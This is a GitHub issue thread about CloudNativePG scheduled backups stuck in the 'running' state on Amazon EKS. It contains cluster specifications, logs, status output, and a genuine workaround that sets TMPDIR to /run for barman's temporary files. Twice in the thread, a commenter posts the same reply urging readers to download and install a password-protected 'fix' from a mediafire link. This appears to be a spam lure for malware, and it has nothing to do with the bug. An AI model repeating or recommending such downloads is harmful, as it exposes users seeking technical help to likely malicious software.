### ISSUE TITLE
[Bug]: Scheduled backups stuck

### ISSUE THREAD

**Issue by mimperatore** [cloudnative-pg/cloudnative-pg#5420]
### Is there an existing issue already for this bug?

- [X] I have searched for an existing issue, and could not find anything. I believe this is a new bug.

### I have read the troubleshooting guide

- [X] I have read the troubleshooting guide and I think this is a new bug.

### I am running a supported version of CloudNativePG

- [X] I have read the troubleshooting guide and I think this is a new bug.

### Version

1.24.0

### What version of Kubernetes are you using?

1.29

### What is your Kubernetes environment?

Cloud: Amazon EKS

### How did you install the operator?

Helm

### What happened?

Backups appear to start, but remain in a "running" state and do not complete.  No data is written to S3.  The data to backup is only 50GB and I waited a couple of hours.

Backups were working when first setup, but appear to have stopped working after the K8S nodes running the cluster were shutdown and later restarted (the NodeGroup they were running in was brought down to a desired size of 0).

The Cluster shows the following `condition` from several days ago (when the nodes were shutdown and later restarted).
```    Last Transition Time:  2024-08-25T16:24:01Z
    Message:               New Backup starting up
    Reason:                BackupStarted
    Status:                False
    Type:                  LastBackupSucceeded
```

The cluster is otherwise very healthy.  

I tried testing `barman-cloud-backup` as suggested in the docs, but unfortunately I cannot get into the pod as `root`, so the command fails as it does not have access to a writable `tmp` directory.

```
#kubectl -n cnpg-database exec -it pod/cnpg-cluster-7 -- barman-cloud-backup -v -t --user postgres --endpoint-url https://s3.ca-central-1.amazonaws.com --cloud-provider aws-s3 s3://***redacted***/DbBackups/QA/CNPG cnpg-cluster
...
FileNotFoundError: [Errno 2] No usable temporary directory found in ['/tmp', '/var/tmp', '/usr/tmp', '/']
command terminated with exit code 1
```

I could not find anything of relevance in the log files.  It just seems like the command is stuck waiting for something.

Any suggestions about how to debug this further would be welcome. 

### Cluster resource

```shell
Name:         cnpg-cluster
Namespace:    cnpg-database
Labels:       app.kubernetes.io/instance=cnpg
              app.kubernetes.io/managed-by=Helm
              app.kubernetes.io/name=cluster
              app.kubernetes.io/part-of=cloudnative-pg
              helm.sh/chart=cluster-0.0.10
Annotations:  cnpg.io/reloadedAt: 2024-08-30T14:37:17.225109-04:00
              meta.helm.sh/release-name: cnpg
              meta.helm.sh/release-namespace: cnpg-database
API Version:  postgresql.cnpg.io/v1
Kind:         Cluster
Metadata:
  Creation Timestamp:  2024-08-25T16:15:46Z
  Generation:          11
  Resource Version:    801371533
  UID:                 bf1b61d0-b106-4a7b-8902-4025e2303437
Spec:
  Affinity:
    Node Selector:
      Nodetype:              cnpg
    Pod Anti Affinity Type:  preferred
    Topology Key:            topology.kubernetes.io/zone
  Backup:
    Barman Object Store:
      Data:
        Compression:     gzip
        Encryption:      AES256
        Jobs:            2
      Destination Path:  ***redacted***
      Endpoint URL:      https://s3.ca-central-1.amazonaws.com
      s3Credentials:
        Access Key Id:
          Key:   ACCESS_KEY_ID
          Name:  cnpg-cluster-backup-s3-creds
        Secret Access Key:
          Key:   ACCESS_SECRET_KEY
          Name:  cnpg-cluster-backup-s3-creds
      Wal:
        Compression:   gzip
        Encryption:    AES256
        Max Parallel:  1
    Retention Policy:  30d
    Target:            prefer-standby
  Bootstrap:
    Initdb:
      Database:             iv
      Encoding:             UTF8
      Locale C Type:        C
      Locale Collate:       C
      Owner:                iv
  Enable PDB:               true
  Enable Superuser Access:  true
  Failover Delay:           0
  Image Name:               ghcr.io/cloudnative-pg/postgresql:15.2
  Image Pull Policy:        IfNotPresent
  Instances:                3
  Log Level:                info
  Max Sync Replicas:        0
  Min Sync Replicas:        0
  Monitoring:
    Custom Queries Config Map:
      Key:                    queries
      Name:                   cnpg-default-monitoring
    Disable Default Queries:  false
    Enable Pod Monitor:       true
  Postgres GID:               26
  Postgres UID:               26
  Postgresql:
    Parameters:
      archive_mode:                on
      archive_timeout:             5min
      dynamic_shared_memory_type:  posix
      effective_cache_size:        10GB
      effective_io_concurrency:    256
      log_destination:             csvlog
      log_directory:               /controller/log
      log_filename:                postgres
      log_rotation_age:            0
      log_rotation_size:           0
      log_truncate_on_rotation:    false
      logging_collector:           on
      max_connections:             1716
      max_parallel_workers:        32
      max_replication_slots:       32
      max_stack_depth:             6MB
      max_wal_senders:             20
      max_worker_processes:        32
      min_wal_size:                512MB
      shared_memory_type:          mmap
      shared_preload_libraries:
      ssl_max_protocol_version:    TLSv1.3
      ssl_min_protocol_version:    TLSv1.3
      wal_keep_size:               512MB
      wal_level:                   logical
      wal_log_hints:               on
      wal_receiver_timeout:        5s
      wal_sender_timeout:          5s
    Sync Replica Election Constraint:
      Enabled:              false
  Primary Update Method:    switchover
  Primary Update Strategy:  unsupervised
  Replication Slots:
    High Availability:
      Enabled:      true
      Slot Prefix:  _cnpg_
    Synchronize Replicas:
      Enabled:        true
    Update Interval:  30
  Resources:
  Smart Shutdown Timeout:  180
  Start Delay:             3600
  Stop Delay:              1800
  Storage:
    Resize In Use Volumes:  true
    Size:                   200Gi
  Switchover Delay:         3600
  Wal Storage:
    Resize In Use Volumes:  true
    Size:                   50Gi
Status:
  Available Architectures:
    Go Arch:  amd64
    Hash:     f20cbc18bb03eafc1b02c90a8872b8e7a199e63196e6ce546029ea2a503bb883
    Go Arch:  arm64
    Hash:     e28f9109055832cc1fa1ece7866547f267b43e16c800d7b4335cab24ad5420d4
  Certificates:
    Client CA Secret:  cnpg-cluster-ca
    Expirations:
      Cnpg - Cluster - Ca:           2024-11-23 16:10:47 +0000 UTC
      Cnpg - Cluster - Replication:  2024-11-23 16:10:47 +0000 UTC
      Cnpg - Cluster - Server:       2024-11-23 22:34:24 +0000 UTC
    Replication TLS Secret:          cnpg-cluster-replication
    Server Alt DNS Names:
      cnpg-cluster-rw
      cnpg-cluster-rw.cnpg-database
      cnpg-cluster-rw.cnpg-database.svc
      cnpg-cluster-rw.cnpg-database.svc.cluster.local
      cnpg-cluster-r
      cnpg-cluster-r.cnpg-database
      cnpg-cluster-r.cnpg-database.svc
      cnpg-cluster-r.cnpg-database.svc.cluster.local
      cnpg-cluster-ro
      cnpg-cluster-ro.cnpg-database
      cnpg-cluster-ro.cnpg-database.svc
      cnpg-cluster-ro.cnpg-database.svc.cluster.local
    Server CA Secret:             cnpg-cluster-ca
    Server TLS Secret:            cnpg-cluster-server
  Cloud Native PG Commit Hash:    5fe5bb6b
  Cloud Native PG Operator Hash:  f20cbc18bb03eafc1b02c90a8872b8e7a199e63196e6ce546029ea2a503bb883
  Conditions:
    Last Transition Time:  2024-08-30T22:12:59Z
    Message:               Cluster is Ready
    Reason:                ClusterIsReady
    Status:                True
    Type:                  Ready
    Last Transition Time:  2024-08-30T20:35:33Z
    Message:               Continuous archiving is working
    Reason:                ContinuousArchivingSuccess
    Status:                True
    Type:                  ContinuousArchiving
    Last Transition Time:  2024-08-25T16:24:01Z
    Message:               New Backup starting up
    Reason:                BackupStarted
    Status:                False
    Type:                  LastBackupSucceeded
  Config Map Resource Version:
    Metrics:
      Cnpg - Default - Monitoring:  789469700
  Current Primary:                  cnpg-cluster-6
  Current Primary Timestamp:        2024-08-30T20:35:32.514945Z
  Healthy PVC:
    cnpg-cluster-5
    cnpg-cluster-5-wal
    cnpg-cluster-6
    cnpg-cluster-6-wal
    cnpg-cluster-7
    cnpg-cluster-7-wal
  Image:  ghcr.io/cloudnative-pg/postgresql:15.2
  Instance Names:
    cnpg-cluster-5
    cnpg-cluster-6
    cnpg-cluster-7
  Instances:  3
  Instances Reported State:
    cnpg-cluster-5:
      Is Primary:    false
      Time Line ID:  128
    cnpg-cluster-6:
      Is Primary:    true
      Time Line ID:  128
    cnpg-cluster-7:
      Is Primary:    false
      Time Line ID:  128
  Instances Status:
    Healthy:
      cnpg-cluster-5
      cnpg-cluster-6
      cnpg-cluster-7
  Latest Generated Node:  7
  Managed Roles Status:
  Phase:  Cluster in healthy state
  Pooler Integrations:
    Pg Bouncer Integration:
      Secrets:
        cnpg-cluster-pooler
  Pvc Count:        6
  Read Service:     cnpg-cluster-r
  Ready Instances:  3
  Secrets Resource Version:
    Application Secret Version:  798831083
    Client Ca Secret Version:    798343139
    Replication Secret Version:  798343141
    Server Ca Secret Version:    798343139
    Server Secret Version:       798466030
    Superuser Secret Version:    798831080
  Switch Replica Cluster Status:
  Target Primary:            cnpg-cluster-6
  Target Primary Timestamp:  2024-08-30T20:35:28.953410Z
  Timeline ID:               128
  Topology:
    Instances:
      cnpg-cluster-5:
      cnpg-cluster-6:
      cnpg-cluster-7:
    Nodes Used:              3
    Successfully Extracted:  true
  Write Service:             cnpg-cluster-rw
Events:                      <none>
```

### Relevant log output

```shell
#kubectl -n cnpg-database get backup                                            
NAME                                       AGE     CLUSTER        METHOD              PHASE     ERROR
cnpg-cluster-daily-backup-20240830221000   62m     cnpg-cluster   barmanObjectStore   running

#kubectl -n cnpg-database logs -f pod/cnpg-cluster-7
{"level":"info","ts":"2024-08-30T22:10:00Z","msg":"WAL archiving is working","logging_pod":"cnpg-cluster-7"}
{"level":"info","ts":"2024-08-30T22:10:00Z","msg":"Starting barman-cloud-backup","backupName":"cnpg-cluster-daily-backup-20240830221000","backupNamespace":"cnpg-cluster-daily-backup-20240830221000","logging_pod":"cnpg-cluster-7","options":["--user","postgres","--name","backup-20240830221000","--gzip","--encryption","AES256","--jobs","2","--endpoint-url","https://s3.ca-central-1.amazonaws.com","--cloud-provider","aws-s3","s3://***redacted***/DbBackups/QA/CNPG","cnpg-cluster"]}

#kubectl cnpg -n cnpg-database status cnpg-cluster
Cluster Summary
Name:                cnpg-cluster
Namespace:           cnpg-database
System ID:           7407111603205636115
PostgreSQL Image:    ghcr.io/cloudnative-pg/postgresql:15.2
Primary instance:    cnpg-cluster-6
Primary start time:  2024-08-30 20:35:33 +0000 UTC (uptime 2h45m32s)
Status:              Cluster in healthy state
Instances:           3
Ready instances:     3
Current Write LSN:   17/17000000 (Timeline: 128 - WAL File: 000000800000001700000016)

Certificates Status
Certificate Name          Expiration Date                Days Left Until Expiration
----------------          ---------------                --------------------------
cnpg-cluster-ca           2024-11-23 16:10:47 +0000 UTC  84.70
cnpg-cluster-replication  2024-11-23 16:10:47 +0000 UTC  84.70
cnpg-cluster-server       2024-11-23 22:34:24 +0000 UTC  84.97

Continuous Backup status
First Point of Recoverability:  Not Available
Working WAL archiving:          OK
WALs waiting to be archived:    0
Last Archived WAL:              000000800000001700000016   @   2024-08-30T20:45:33.582472Z
Last Failed WAL:                00000080.history           @   2024-08-30T20:35:32.469376Z

Physical backups
No running physical backups found

Streaming Replication status
Replication Slots Enabled
Name            Sent LSN     Write LSN    Flush LSN    Replay LSN   Write Lag  Flush Lag  Replay Lag  State      Sync State  Sync Priority  Replication Slot
----            --------     ---------    ---------    ----------   ---------  ---------  ----------  -----      ----------  -------------  ----------------
cnpg-cluster-5  17/17000000  17/17000000  17/17000000  17/17000000  00:00:00   00:00:00   00:00:00    streaming  async       0              active
cnpg-cluster-7  17/17000000  17/17000000  17/17000000  17/17000000  00:00:00   00:00:00   00:00:00    streaming  async       0              active

Unmanaged Replication Slot Status
No unmanaged replication slots found

Managed roles status
No roles managed

Tablespaces status
No managed tablespaces

Pod Disruption Budgets status
Name                  Role     Expected Pods  Current Healthy  Minimum Desired Healthy  Disruptions Allowed
----                  ----     -------------  ---------------  -----------------------  -------------------
cnpg-cluster          replica  2              2                1                        1
cnpg-cluster-primary  primary  1              1                1                        0

Instances status
Name            Database Size  Current LSN  Replication role  Status  QoS         Manager Version  Node
----            -------------  -----------  ----------------  ------  ---         ---------------  ----
cnpg-cluster-6  47 GB          17/17000000  Primary           OK      BestEffort  1.24.0           ip-172-32-19-6.ca-central-1.compute.internal
cnpg-cluster-5  47 GB          17/17000000  Standby (async)   OK      BestEffort  1.24.0           ip-172-32-9-224.ca-central-1.compute.internal
cnpg-cluster-7  47 GB          17/17000000  Standby (async)   OK      BestEffort  1.24.0           ip-172-32-36-182.ca-central-1.compute.internal
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by brouberol** [comment]
I've stumbled upon the same issue yesterday. The issue was that `/tmp`, `/var/tmp', '/usr/tmp', and '/' were all part of a read-only filesystem, so could not be written to.

However, the operator does mount an ephemeral volume (`emptyDir`) [to both `/run` and `/controller`](https://github.com/cloudnative-pg/cloudnative-pg/blob/71df15df4af9f4a335f76cbb7ea775e9c88428b2/pkg/specs/volumes.go#L248-L266) (in fact, it is the same volume mounted in these 2 locations). `scratch-data` is indeed [an ephemeral volume](https://github.com/cloudnative-pg/cloudnative-pg/blob/d5c0068659c8b9c6fe7a69b821c6bf328bf71553/pkg/specs/pgbouncer/deployments.go#L95-L100).

What I ended up doing is setting the `TMPDIR` environment variable to `/run` in the postgresql pods, as this is what [cpython uses to determine extra tempfile locations](https://github.com/python/cpython/blob/main/Lib/tempfile.py#L163-L165) (and barman is written in python).

Example:
```
postgres@postgresql-test-2:/srv/app$ python3
Python 3.11.2 (main, May  2 2024, 11:59:08) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.getenv('TMPDIR')
>>> import tempfile
>>> tempfile.mkdtemp()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python3.11/tempfile.py", line 512, in mkdtemp
    prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
                                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/tempfile.py", line 265, in _sanitize_params
    dir = gettempdir()
          ^^^^^^^^^^^^
  File "/usr/lib/python3.11/tempfile.py", line 454, in gettempdir
    return _os.fsdecode(_gettempdir())
                        ^^^^^^^^^^^^^
  File "/usr/lib/python3.11/tempfile.py", line 447, in _gettempdir
    tempdir = _get_default_tempdir()
              ^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/tempfile.py", line 362, in _get_default_tempdir
    raise FileNotFoundError(_errno.ENOENT,
FileNotFoundError: [Errno 2] No usable temporary directory found in ['/tmp', '/var/tmp', '/usr/tmp', '/srv/app']
>>>
postgres@postgresql-test-2:/srv/app$ export TMPDIR=/run
postgres@postgresql-test-2:/srv/app$ python3
Python 3.11.2 (main, May  2 2024, 11:59:08) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import tempfile
>>> tempfile.mkdtemp()
'/run/tmpvn9860lm'
```

I hope this helps!

**Note**: I've had to modify the custom chart I use to provision a cloudnative-pg cluster, but [`ClusterSpec`](https://cloudnative-pg.io/documentation/1.24/cloudnative-pg.v1/#postgresql-cnpg-io-v1-ClusterSpec)  does support an `env` member, of the same structure as the regular `container.spec`:

```yaml
env:
- name: "TMPDIR"
  value: "/run" 
```

**Comment by mimperatore** [comment]
Thanks for the suggestion.  

It turn out that in my case the backups just magically started working again after a few days, so I no longer have a reproducible situation, but if it happens again, I'll keep this mind.

**Comment by ramithect** [comment]
I've the same situation here:

I was using cloudnative pg 1.22 and the backups were working fine but after I upgrade to 1.24 my backups stuck in running state and no base directory is created in my object storage but when I look into my hosts processes I see barman-cloud-backup command which is running 


```
cnpg-cloudnative-pg-7fcc5f7865-cb2sq manager {"level":"info","ts":"2024-09-14T11:41:05+03:30","logger":"backup-resource","msg":"default","version":"v1","name":"traccar-sample-backuo","namespace":"database"}
cnpg-cloudnative-pg-7fcc5f7865-cb2sq manager {"level":"info","ts":"2024-09-14T11:41:05+03:30","logger":"backup-resource","msg":"validate create","version":"v1","name":"traccar-sample-backuo","namespace":"database"}
cnpg-cloudnative-pg-7fcc5f7865-cb2sq manager {"level":"info","ts":"2024-09-14T11:41:05+03:30","msg":"Starting backup","controller":"backup","controllerGroup":"postgresql.cnpg.io","controllerKind":"Backup","Backup":{"name":"traccar-sample-backuo","namespace":"database"},"namespace":"database","name":"traccar-sample-backuo","reconcileID":"ce52ec85-c49e-4522-ab58-8b59975ab1eb","cluster":"traccar-db","pod":"traccar-db-4"}
cnpg-cloudnative-pg-7fcc5f7865-cb2sq manager {"level":"info","ts":"2024-09-14T11:41:06+03:30","msg":"Backup is already running on","controller":"backup","controllerGroup":"postgresql.cnpg.io","controllerKind":"Backup","Backup":{"name":"traccar-sample-backuo","namespace":"database"},"namespace":"database","name":"traccar-sample-backuo","reconcileID":"70f7204b-0f48-4ca8-a279-00b2d1bd88df","cluster":"traccar-db","pod":"traccar-db-4","started at":"<nil>"}
cnpg-cloudnative-pg-7fcc5f7865-cb2sq manager {"level":"info","ts":"2024-09-14T13:01:06+03:30","msg":"Backup is already running on","controller":"backup","controllerGroup":"postgresql.cnpg.io","controllerKind":"Backup","Backup":{"name":"traccar-sample-backuo","namespace":"database"},"namespace":"database","name":"traccar-sample-backuo","reconcileID":"9ec26ecd-be95-47ff-a42d-bb27be6d093f","cluster":"traccar-db","pod":"traccar-db-4","started at":"<nil>"}
```

On the other side when I get statun with cnpg plugin it say no running physical backups existed
```
NAME                    AGE     CLUSTER      METHOD              PHASE     ERROR
traccar-sample-backuo   5h40m   traccar-db   barmanObjectStore   running   
```

```
Status:              Cluster in healthy state 
Instances:           3
Ready instances:     3
Current Write LSN:   9F2/74845CB0 (Timeline: 13 - WAL File: 0000000D000009F200000074)

Certificates Status
Certificate Name        Expiration Date                Days Left Until Expiration
----------------        ---------------                --------------------------
traccar-db-ca           2024-12-03 15:09:40 +0000 UTC  80.05
traccar-db-replication  2024-12-03 15:09:40 +0000 UTC  80.05
traccar-db-server       2024-12-09 10:39:35 +0000 UTC  85.87

Continuous Backup status
First Point of Recoverability:  Not Available
Working WAL archiving:          OK
WALs waiting to be archived:    33
Last Archived WAL:              0000000D000009F200000052   @   2024-09-14T17:22:57.587133+03:30
Last Failed WAL:                0000000D000009C70000003D   @   2024-09-12T19:24:24.957536+03:30

Physical backups
No running physical backups found
```

**Comment by jeremie-lesage** [comment]
To speed up the WAL backup, you can increase the `maxParallel` parameter on `WalBackupConfiguration`. By default, WAL files are processed one at a time (i.e., one per minute).

https://cloudnative-pg.io/documentation/current/cloudnative-pg.v1/#postgresql-cnpg-io-v1-WalBackupConfiguration
